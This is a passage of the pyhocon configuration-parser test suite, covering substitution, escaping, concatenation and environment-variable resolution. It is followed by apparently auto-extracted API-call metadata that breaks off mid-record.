assert config['a'] == 1 and config['b'] == 1
def test_object_field_substitution(self):
config = ConfigFactory.parse_string(
"""
A = ${Test}
Test {
field1 = 1
field2 = ${Test.field1}"2"
field3 = ${Test.field2}"3"
}
"""
)
assert config.get_string("A.field1") == "1"
assert config.get_string("A.field2") == "12"
assert config.get_string("A.field3") == "123"
assert config.get_string("Test.field1") == "1"
assert config.get_string("Test.field2") == "12"
assert config.get_string("Test.field3") == "123"
def test_one_line_quote_escape(self):
config = ConfigFactory.parse_string(
"""
test_no_quotes: abc\\n\\n
test_quotes: "abc\\n\\n"
"""
)
assert config == {
'test_no_quotes': 'abc\n\n',
'test_quotes': 'abc\n\n'
}
def test_multi_line_escape(self):
config = ConfigFactory.parse_string(
"""
with-escaped-backslash: \"\"\"
\\\\
\"\"\"
with-newline-escape-sequence: \"\"\"
\\n
\"\"\"
with-escaped-newline-escape-sequence: \"\"\"
\\\\n
\"\"\"
"""
)
assert config['with-escaped-backslash'] == '\n\\\\\n'
assert config['with-newline-escape-sequence'] == '\n\\n\n'
assert config['with-escaped-newline-escape-sequence'] == '\n\\\\n\n'
def test_multiline_with_backslash(self):
config = ConfigFactory.parse_string(
"""
test = line1 \
line2
test2 = test
""")
assert config == {
'test': 'line1 line2',
'test2': 'test'
}
def test_from_dict_with_dict(self):
d = {
'banana': 3,
'apple': 4,
'pear': 1,
'orange': 2,
}
config = ConfigFactory.from_dict(d)
assert config == d
def test_from_dict_with_ordered_dict(self):
d = OrderedDict()
d['banana'] = 3
d['apple'] = 4
d['pear'] = 1
d['orange'] = 2
config = ConfigFactory.from_dict(d)
assert config == d
def test_from_dict_with_nested_dict(self):
d = OrderedDict()
d['banana'] = 3
d['apple'] = 4
d['pear'] = 1
d['tree'] = {
'a': 'abc\ntest\n',
'b': [1, 2, 3]
}
config = ConfigFactory.from_dict(d)
assert config == d
def test_object_concat(self):
config = ConfigFactory.parse_string(
"""o1 = {
foo : {
a : 1
b : 2
}
}
o2 = {
foo : {
b : 3
c : 4
}
}
o3 = ${o1} ${o2}
"""
)
assert config.get_int('o1.foo.b') == 2
assert config.get_int('o2.foo.b') == 3
assert config.get_int('o3.foo.b') == 3
assert config.get_int('o1.foo.c', default=42) == 42
assert config.get_int('o3.foo.a') == 1
assert config.get_int('o3.foo.c') == 4
def test_issue_75(self):
config = ConfigFactory.parse_string(
"""base : {
bar: ["a"]
}
sub : ${base} {
baz: ${base.bar} ["b"]
}
sub2: ${sub}
"""
)
assert config.get_list('base.bar') == ["a"]
assert config.get_list('sub.baz') == ["a", "b"]
assert config.get_list('sub2.baz') == ["a", "b"]
def test_plain_ordered_dict(self):
config = ConfigFactory.parse_string(
"""
e : ${a} {
}
""",
resolve=False
)
with pytest.raises(ConfigException):
config.as_plain_ordered_dict()
def test_quoted_strings_with_ws(self):
config = ConfigFactory.parse_string(
"""
no_trailing_ws = "foo" "bar "
trailing_ws = "foo" "bar "{ws}
trailing_ws_with_comment = "foo" "bar "{ws}// comment
""".format(ws=' '))
assert config == {
'no_trailing_ws': "foo bar ",
'trailing_ws': "foo bar ",
'trailing_ws_with_comment': "foo bar "
}
def test_unquoted_strings_with_ws(self):
config = ConfigFactory.parse_string(
"""
a = foo bar
""")
assert config == {
'a': 'foo bar'
}
def test_quoted_unquoted_strings_with_ws(self):
config = ConfigFactory.parse_string(
"""
a = foo "bar" dummy
""")
assert config == {
'a': 'foo bar dummy'
}
def test_quoted_unquoted_strings_with_ws_substitutions(self):
config = ConfigFactory.parse_string(
"""
x = 5
b = test
a = foo "bar" ${b} dummy
c = foo ${x} bv
d = foo ${x} 43
""")
assert config == {
'x': 5,
'b': 'test',
'a': 'foo bar test dummy',
'c': 'foo 5 bv',
'd': 'foo 5 43'
}
def test_complex_substitutions(self):
config = ConfigFactory.parse_string(
"""
a: 1
b: ${c} {
pa: [${a}]
pb: ${b.pa}
}
c: { }
d: { pc: ${b.pa} }
e: ${b}
""", resolve=True)
assert config == {
'a': 1,
'b': {'pa': [1], 'pb': [1]},
'c': {},
'd': {'pc': [1]},
'e': {'pa': [1], 'pb': [1]}
}
def test_assign_next_line(self):
config = ConfigFactory.parse_string(
"""
a = // abc
abc
c =
5
""")
assert config == {
'a': 'abc',
'c': 5
}
@mock.patch.dict(os.environ, STRING_VAR='value_from_environment')
def test_string_from_environment(self):
config = ConfigFactory.parse_string(
"""
string_from_env = ${STRING_VAR}
""")
assert config == {
'string_from_env': 'value_from_environment'
}
@mock.patch.dict(os.environ, STRING_VAR='value_from_environment')
def test_string_from_environment_self_ref(self):
config = ConfigFactory.parse_string(
"""
STRING_VAR = ${STRING_VAR}
""")
assert config == {
'STRING_VAR': 'value_from_environment'
}
@mock.patch.dict(os.environ, STRING_VAR='value_from_environment')
def test_string_from_environment_self_ref_optional(self):
config = ConfigFactory.parse_string(
"""
STRING_VAR = ${?STRING_VAR}
""")
assert config == {
'STRING_VAR': 'value_from_environment'
}
@mock.patch.dict(os.environ, TRUE_OR_FALSE='false')
def test_bool_from_environment(self):
config = ConfigFactory.parse_string(
"""
bool_from_env = ${TRUE_OR_FALSE}
""")
assert config == {
'bool_from_env': 'false'
}
assert config.get_bool('bool_from_env') is False
@mock.patch.dict(os.environ, INT_VAR='5')
def test_int_from_environment(self):
config = ConfigFactory.parse_string(
"""
int_from_env = ${INT_VAR}
""")
assert config == {
'int_from_env': '5'
}
assert config.get_int('int_from_env') == 5
def test_unicode_dict_key(self):
input_string = u"""
www.sample.com {
us {
name = "first domain"
}
}
www.example-ö.com {
us {
name = "second domain"
}
}
"""
config = ConfigFactory.parse_string(input_string)
assert config.get_string(u'www.sample.com.us.name') == 'first domain'
assert config.get_string(u'www.example-ö.com.us.name') == 'second domain'
with pytest.raises(ConfigWrongTypeException):
config.put(u'www.example-ö', 'append_failure', append=True)
with pytest.raises(ConfigMissingException):
config.get_string(u'missing_unicode_key_ö')
with pytest.raises(ConfigException):
config.get_bool(u'www.example-ö.com.us.name')
with pytest.raises(ConfigException):
config.get_list(u'www.example-ö.com.us.name')
with pytest.raises(ConfigException):
config.get_config(u'www.example-ö.com.us.name')
with pytest.raises(ConfigWrongTypeException):
config.get_string(u'www.example-ö.com.us.name.missing')
def test_with_comment_on_last_line(self):
# Adress issue #102
config_tree = ConfigFactory.parse_string("""
foo: "1"
bar: "2"
# DO NOT CHANGE ANY OF THE ABOVE SETTINGS!""")
assert config_tree == {
'foo': '1',
'bar': '2'
}
def test_triple_quotes_same_line(self):
config_tree = ConfigFactory.parse_string('a:["""foo"""", "bar"]')
assert config_tree == {
'a': ['foo"', "bar"]
}
def test_pop(self):
config_tree = ConfigFactory.parse_string('a:{b: 3, d: 6}')
assert 3 == config_tree.pop('a.b', 5)
assert 5 == config_tree.pop('a.c', 5)
expected = {
'a': {'d': 6}
}
assert expected == config_tree
def test_merge_overriden(self):
# Adress issue #110
# ConfigValues must merge with its .overriden_value
# if both are ConfigTree
config_tree = ConfigFactory.parse_string("""
foo: ${bar}
foo: ${baz}
bar: {r: 1, s: 2}
baz: {s: 3, t: 4}
""")
assert 'r' in config_tree['foo'] and 't' in config_tree['foo'] and config_tree['foo']['s'] == 3
def test_attr_syntax(self):
config = ConfigFactory.parse_string(
"""
a: 1
b: {
pb: 5
}
""")
assert 5 == config.b.pb
def test_escape_quote(self):
config = ConfigFactory.parse_string(
"""
quoted: "abc\\"test"
unquoted: abc\\"test
""")
assert 'abc"test' == config['quoted']
assert 'abc"test' == config['unquoted']
def test_escape_quote_complex(self):
config = ConfigFactory.parse_string(
"""
value: "{\\"critical\\":\\"0.00\\",\\"warning\\":\\"99.99\\"}"
"""
)
assert '{"critical":"0.00","warning":"99.99"}' == config['value']
def test_keys_with_slash(self):
config = ConfigFactory.parse_string(
"""
/abc/cde1: abc
"/abc/cde2": "cde"
/abc/cde3: "fgh"
""")
assert 'abc' == config['/abc/cde1']
assert 'cde' == config['/abc/cde2']
assert 'fgh' == config['/abc/cde3']
def test_mutation_values(self):
config = ConfigFactory.parse_string(
"""
common : {
}
b1 = []
var = "wrong"
compilerCommon : ${common} {
VAR : ${var}
}
substrate-suite: {
VAR : "right"
}
b1 = [
${compilerCommon} ${substrate-suite}
${compilerCommon} ${substrate-suite}
]
b2 = [
${compilerCommon} ${substrate-suite}
${compilerCommon} ${substrate-suite}
]
""")
assert config.get("b1")[1]['VAR'] == 'right'
assert config.get("b2")[1]['VAR'] == 'right'
def test_escape_sequences_json_equivalence(self):
"""
Quoted strings are in the same format as JSON strings,
See: https://github.com/lightbend/config/blob/master/HOCON.md#unchanged-from-json
"""
source = r"""
{
"plain-backslash": "\\",
"tab": "\t",
"no-tab": "\\t",
"newline": "\n",
"no-newline": "\\n",
"cr": "\r",
"no-cr": "\\r",
"windows": "c:\\temp"
}
"""
expected = {
'plain-backslash': '\\',
'tab': '\t',
'no-tab': '\\t',
'newline': '\n',
'no-newline': '\\n',
'cr': '\r',
'no-cr': '\\r',
'windows': 'c:\\temp',
}
config = ConfigFactory.parse_string(source)
assert config == expected
assert config == json.loads(source)
try:
from dateutil.relativedelta import relativedelta
@pytest.mark.parametrize('data_set', [
('a: 1 months', relativedelta(months=1)),
('a: 1months', relativedelta(months=1)),
('a: 2 month', relativedelta(months=2)),
('a: 3 mo', relativedelta(months=3)),
('a: 3mo', relativedelta(months=3)),
('a: 3 mon', '3 mon'),
('a: 1 years', relativedelta(years=1)),
('a: 1years', relativedelta(years=1)),
('a: 2 year', relativedelta(years=2)),
('a: 3 y', relativedelta(years=3)),
('a: 3y', relativedelta(years=3)),
])
def test_parse_string_with_duration_optional_units(data_set):
config = ConfigFactory.parse_string(data_set[0])
assert config['a'] == data_set[1]
except Exception:
pass
| [
"mock.patch.dict",
"pyhocon.ConfigParser.resolve_package_path",
"dateutil.relativedelta.relativedelta",
"pyhocon.ConfigTree.merge_configs",
"datetime.timedelta",
"pyhocon.ConfigParser.resolve_substitutions",
"os.path.exists",
"os.mkdir",
"tempfile.NamedTemporaryFile",
"collections.OrderedDict",
"json.loads",
"pyhocon.ConfigFactory.parse_file",
"pyhocon.ConfigFactory.parse_string",
"tempfile.mkdtemp",
"pytest.raises",
"pyhocon.ConfigFactory.parse_URL",
"os.path.join",
"pytest.mark.parametrize",
"shutil.rmtree",
"pyhocon.ConfigFactory.from_dict"
] | [((2066, 2153), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""forbidden_char"""', "['+', '`', '^', '?', '!', '@', '*', '&']"], {}), "('forbidden_char', ['+', '`', '^', '?', '!', '@',\n '*', '&'])\n", (2089, 2153), False, 'import pytest\n'), ((2350, 2403), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""forbidden_char"""', '[\'$\', \'"\']'], {}), '(\'forbidden_char\', [\'$\', \'"\'])\n', (2373, 2403), False, 'import pytest\n'), ((2611, 2698), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""forbidden_char"""', "['+', '`', '^', '?', '!', '@', '*', '&']"], {}), "('forbidden_char', ['+', '`', '^', '?', '!', '@',\n '*', '&'])\n", (2634, 2698), False, 'import pytest\n'), ((62337, 62401), 'mock.patch.dict', 'mock.patch.dict', (['os.environ'], {'STRING_VAR': '"""value_from_environment"""'}), "(os.environ, STRING_VAR='value_from_environment')\n", (62352, 62401), False, 'import mock\n'), ((62667, 62731), 'mock.patch.dict', 'mock.patch.dict', (['os.environ'], {'STRING_VAR': '"""value_from_environment"""'}), "(os.environ, STRING_VAR='value_from_environment')\n", (62682, 62731), False, 'import mock\n'), ((62996, 63060), 'mock.patch.dict', 'mock.patch.dict', (['os.environ'], {'STRING_VAR': '"""value_from_environment"""'}), "(os.environ, STRING_VAR='value_from_environment')\n", (63011, 63060), False, 'import mock\n'), ((63335, 63385), 'mock.patch.dict', 'mock.patch.dict', (['os.environ'], {'TRUE_OR_FALSE': '"""false"""'}), "(os.environ, TRUE_OR_FALSE='false')\n", (63350, 63385), False, 'import mock\n'), ((63688, 63728), 'mock.patch.dict', 'mock.patch.dict', (['os.environ'], {'INT_VAR': '"""5"""'}), "(os.environ, INT_VAR='5')\n", (63703, 63728), False, 'import mock\n'), ((696, 1177), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""t = {\n c = 5\n "d" = true\n e.y = {\n f: 7\n g: "hey dude!"\n h: hey man\n i = ""\\"\n "first line"\n "second" line\n ""\\"\n }\n j = [1, 2, 3]\n u = 192.168.1.3/32\n g = null\n }\n """'], {}), '(\n """t = {\n c = 5\n "d" = true\n e.y = {\n f: 7\n g: "hey dude!"\n h: hey man\n i = ""\\"\n "first line"\n "second" line\n ""\\"\n }\n j = [1, 2, 3]\n u = 192.168.1.3/32\n g = null\n }\n """\n )\n', (722, 1177), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((2997, 3146), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n {\n a: {\n b: 5\n }\n }\n """'], {}), '(\n """\n {\n a: {\n b: 5\n }\n }\n """\n )\n', (3023, 3146), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((5001, 5040), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['data_set[0]'], {}), '(data_set[0])\n', (5027, 5040), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((5169, 5288), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n a: foo\n b: 10 weeks\n c: bar\n """'], {}), '(\n """\n a: foo\n b: 10 weeks\n c: bar\n """\n )\n', (5195, 5288), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((5448, 5587), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n a: foo\n b: [a, 1, 10 weeks, 5 minutes,]\n c: bar\n """'], {}), '(\n """\n a: foo\n b: [a, 1, 10 weeks, 5 minutes,]\n c: bar\n """\n )\n', (5474, 5587), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((5750, 5789), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""[1, 2, 3]"""'], {}), "('[1, 2, 3]')\n", (5776, 5789), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((5884, 6113), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n "a.b.c.d": 3\n t {\n "d": {\n "c": 5\n }\n }\n k {\n "b.f.d": 7\n }\n """'], {}), '(\n """\n "a.b.c.d": 3\n t {\n "d": {\n "c": 5\n }\n }\n k {\n "b.f.d": 7\n }\n """\n )\n', (5910, 6113), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((6302, 6493), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n a {\n b = foo\n c = bar\n }\n a.c = ${a.b}" "${a.b}\n a.d = baz\n """'], {}), '(\n """\n a {\n b = foo\n c = bar\n }\n a.c = ${a.b}" "${a.b}\n a.d = baz\n """\n )\n', (6328, 6493), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((6685, 6906), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n a=1,\n b="abc",\n c=the man,\n d=woof,\n a-b-c-d=test,\n a b c d=test2,\n "a b c d e"=test3\n """'], {}), '(\n """\n a=1,\n b="abc",\n c=the man,\n d=woof,\n a-b-c-d=test,\n a b c d=test2,\n "a b c d e"=test3\n """\n )\n', (6711, 6906), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((7274, 7784), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n a {\n d {\n g.h.j.u: 5\n g {\n h.d: 4\n }\n g.h.k: f d\n }\n\n h.i.m = 7\n h.i {\n d: 5\n }\n\n h.i {\n e:65\n }\n }\n """'], {}), '(\n """\n a {\n d {\n g.h.j.u: 5\n g {\n h.d: 4\n }\n g.h.k: f d\n }\n\n h.i.m = 7\n h.i {\n d: 5\n }\n\n h.i {\n e:65\n }\n }\n """\n )\n', (7300, 7784), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((8473, 9026), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n // comment 1\n # comment 2\n {\n c = test // comment 0\n g = 6 test # comment 0\n # comment 3\n a: { # comment 4\n b: test, # comment 5\n } # comment 6\n t = [1, # comment 7\n 2, # comment 8\n 3, # comment 9\n ]\n } # comment 10\n // comment 11\n // comment 12\n """'], {}), '(\n """\n // comment 1\n # comment 2\n {\n c = test // comment 0\n g = 6 test # comment 0\n # comment 3\n a: { # comment 4\n b: test, # comment 5\n } # comment 6\n t = [1, # comment 7\n 2, # comment 8\n 3, # comment 9\n ]\n } # comment 10\n // comment 11\n // comment 12\n """\n )\n', (8499, 9026), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((9314, 9379), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n a = 5\n """'], {}), '("""\n a = 5\n """)\n', (9340, 9379), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((9581, 9677), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n a = null\n b = [null]\n """'], {}), '(\n """\n a = null\n b = [null]\n """)\n', (9607, 9677), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((9829, 10122), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n {\n a: {\n b: {\n c = 5\n }\n }\n a.b {\n c = 7\n d = 8\n }\n }\n """'], {}), '(\n """\n {\n a: {\n b: {\n c = 5\n }\n }\n a.b {\n c = 7\n d = 8\n }\n }\n """\n )\n', (9855, 10122), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((10266, 10433), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n a: {b: 1}\n a: {c: 2}\n b: {c: 3} {d: 4} {\n c: 5\n }\n """'], {}), '(\n """\n a: {b: 1}\n a: {c: 2}\n b: {c: 3} {d: 4} {\n c: 5\n }\n """\n )\n', (10292, 10433), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((10650, 10769), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n a = a b c\n b = 5 b\n c = b 7\n """'], {}), '(\n """\n a = a b c\n b = 5 b\n c = b 7\n """\n )\n', (10676, 10769), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((10955, 11091), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n a = [1, 2] [3, 4] [\n 5,\n 6\n ]\n """'], {}), '(\n """\n a = [1, 2] [3, 4] [\n 5,\n 6\n ]\n """\n )\n', (10981, 11091), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((11256, 11294), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""a = 45\n"""'], {}), "('a = 45\\n')\n", (11282, 11294), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((11682, 11983), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n {\n a: {\n b: {\n c = str\n e = "str "\n }\n }\n d = ${a.b.c}\n f = ${a.b.e}\n }\n """'], {}), '(\n """\n {\n a: {\n b: {\n c = str\n e = "str "\n }\n }\n d = ${a.b.c}\n f = ${a.b.e}\n }\n """\n )\n', (11708, 11983), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((12149, 12462), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n {\n a: {\n b: {\n c = str\n e = "str "\n }\n }\n d = test ${a.b.c}\n f = test ${a.b.e}\n }\n """'], {}), '(\n """\n {\n a: {\n b: {\n c = str\n e = "str "\n }\n }\n d = test ${a.b.c}\n f = test ${a.b.e}\n }\n """\n )\n', (12175, 12462), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((12640, 12962), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['u"""\n {\n a: {\n b: {\n c = str\n e = "str "\n }\n }\n d = test ${a.b.c} me\n f = test ${a.b.e} me\n }\n """'], {}), '(\n u"""\n {\n a: {\n b: {\n c = str\n e = "str "\n }\n }\n d = test ${a.b.c} me\n f = test ${a.b.e} me\n }\n """\n )\n', (12666, 12962), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((13202, 13431), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n app.heap_size = 128\n app.java_opts = [\n -Xms${app.heap_size}m\n -Xmx${app.heap_size}m\n ]\n """'], {}), '(\n """\n app.heap_size = 128\n app.java_opts = [\n -Xms${app.heap_size}m\n -Xmx${app.heap_size}m\n ]\n """\n )\n', (13228, 13431), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((13607, 13837), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n {\n a: {\n b: {\n c = 5\n }\n }\n d = ${a.b.c}\n }\n """'], {}), '(\n """\n {\n a: {\n b: {\n c = 5\n }\n }\n d = ${a.b.c}\n }\n """\n )\n', (13633, 13837), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((13948, 14183), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n {\n a: {\n b: {\n c = 5\n }\n }\n d = test ${a.b.c}\n }\n """'], {}), '(\n """\n {\n a: {\n b: {\n c = 5\n }\n }\n d = test ${a.b.c}\n }\n """\n )\n', (13974, 14183), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((14301, 14539), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n {\n a: {\n b: {\n c = 5\n }\n }\n d = test ${a.b.c} me\n }\n """'], {}), '(\n """\n {\n a: {\n b: {\n c = 5\n }\n }\n d = test ${a.b.c} me\n }\n """\n )\n', (14327, 14539), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((14708, 14971), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n {\n a: {\n b: {\n c = ${e}\n }\n }\n d = test ${a.b.c} me\n e = 7\n }\n """'], {}), '(\n """\n {\n a: {\n b: {\n c = ${e}\n }\n }\n d = test ${a.b.c} me\n e = 7\n }\n """\n )\n', (14734, 14971), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((15132, 15266), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n a = 5\n b=${a}${a}\n c=${a} ${a}\n """'], {}), '(\n """\n a = 5\n b=${a}${a}\n c=${a} ${a}\n """\n )\n', (15158, 15266), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((15440, 15630), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n data-center-generic = { cluster-size = 6 }\n data-center-east = ${data-center-generic} {name = "east"}\n """'], {}), '(\n """\n data-center-generic = { cluster-size = 6 }\n data-center-east = ${data-center-generic} {name = "east"}\n """\n )\n', (15466, 15630), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((15788, 15978), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n data-center-generic = { cluster-size = 6 }\n data-center-east = {name = "east"} ${data-center-generic}\n """'], {}), '(\n """\n data-center-generic = { cluster-size = 6 }\n data-center-east = {name = "east"} ${data-center-generic}\n """\n )\n', (15814, 15978), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((16138, 16366), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n data-center-generic = { cluster-size = 6 }\n data-center-east = {name = "east"} ${data-center-generic} { cluster-size = 9, opts = "-Xmx4g" }\n """'], {}), '(\n """\n data-center-generic = { cluster-size = 6 }\n data-center-east = {name = "east"} ${data-center-generic} { cluster-size = 9, opts = "-Xmx4g" }\n """\n )\n', (16164, 16366), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((16590, 16854), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n data-center-generic = { cluster-size = 6 }\n data-center-east = {name = "east"} ${data-center-generic}\n data-center-east-prod = ${data-center-east} {tmpDir=/tmp}\n """'], {}), '(\n """\n data-center-generic = { cluster-size = 6 }\n data-center-east = {name = "east"} ${data-center-generic}\n data-center-east-prod = ${data-center-east} {tmpDir=/tmp}\n """\n )\n', (16616, 16854), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((17153, 17380), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n data-center-generic = { cluster-size = 6 }\n data-center-east = ${data-center-generic}\n data-center-east = { name = "east" }\n """'], {}), '(\n """\n data-center-generic = { cluster-size = 6 }\n data-center-east = ${data-center-generic}\n data-center-east = { name = "east" }\n """\n )\n', (17179, 17380), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((17529, 17756), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n data-center-generic = { cluster-size = 6 }\n data-center-east = { name = "east" }\n data-center-east = ${data-center-generic}\n """'], {}), '(\n """\n data-center-generic = { cluster-size = 6 }\n data-center-east = { name = "east" }\n data-center-east = ${data-center-generic}\n """\n )\n', (17555, 17756), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((17960, 17999), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""foo = bar"""'], {}), "('foo = bar')\n", (17986, 17999), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((18111, 18150), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""foo = "5\\""""'], {}), '(\'foo = "5"\')\n', (18137, 18150), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((18267, 18310), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""foo = ""\\"5""\\""""'], {}), '(\'foo = """5"""\')\n', (18293, 18310), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((18410, 18447), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""foo = 5"""'], {}), "('foo = 5')\n", (18436, 18447), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((18547, 18586), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""foo = 5.0"""'], {}), "('foo = 5.0')\n", (18573, 18586), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((18680, 18840), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n common_modules = [php, python]\n host_modules = ${common_modules} [java]\n """'], {}), '(\n """\n common_modules = [php, python]\n host_modules = ${common_modules} [java]\n """\n )\n', (18706, 18840), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((18944, 19104), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n common_modules = [php, python]\n host_modules = [java] ${common_modules}\n """'], {}), '(\n """\n common_modules = [php, python]\n host_modules = [java] ${common_modules}\n """\n )\n', (18970, 19104), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((19209, 19376), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n common_modules = [php, python]\n host_modules = [java] ${common_modules} [perl]\n """'], {}), '(\n """\n common_modules = [php, python]\n host_modules = [java] ${common_modules} [perl]\n """\n )\n', (19235, 19376), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((19555, 19777), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n common_modules = [php, python]\n host_modules = [java] ${common_modules} [perl]\n full_modules = ${host_modules} [c, go]\n """'], {}), '(\n """\n common_modules = [php, python]\n host_modules = [java] ${common_modules} [perl]\n full_modules = ${host_modules} [c, go]\n """\n )\n', (19581, 19777), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((20092, 20238), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""\n main_language = php\n languages = [java, ${main_language}]\n """'], {}), '(\n """\n main_language = php\n languages = [java, ${main_language}]\n """\n )\n', (20118, 20238), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n'), ((20378, 20654), 'pyhocon.ConfigFactory.parse_string', 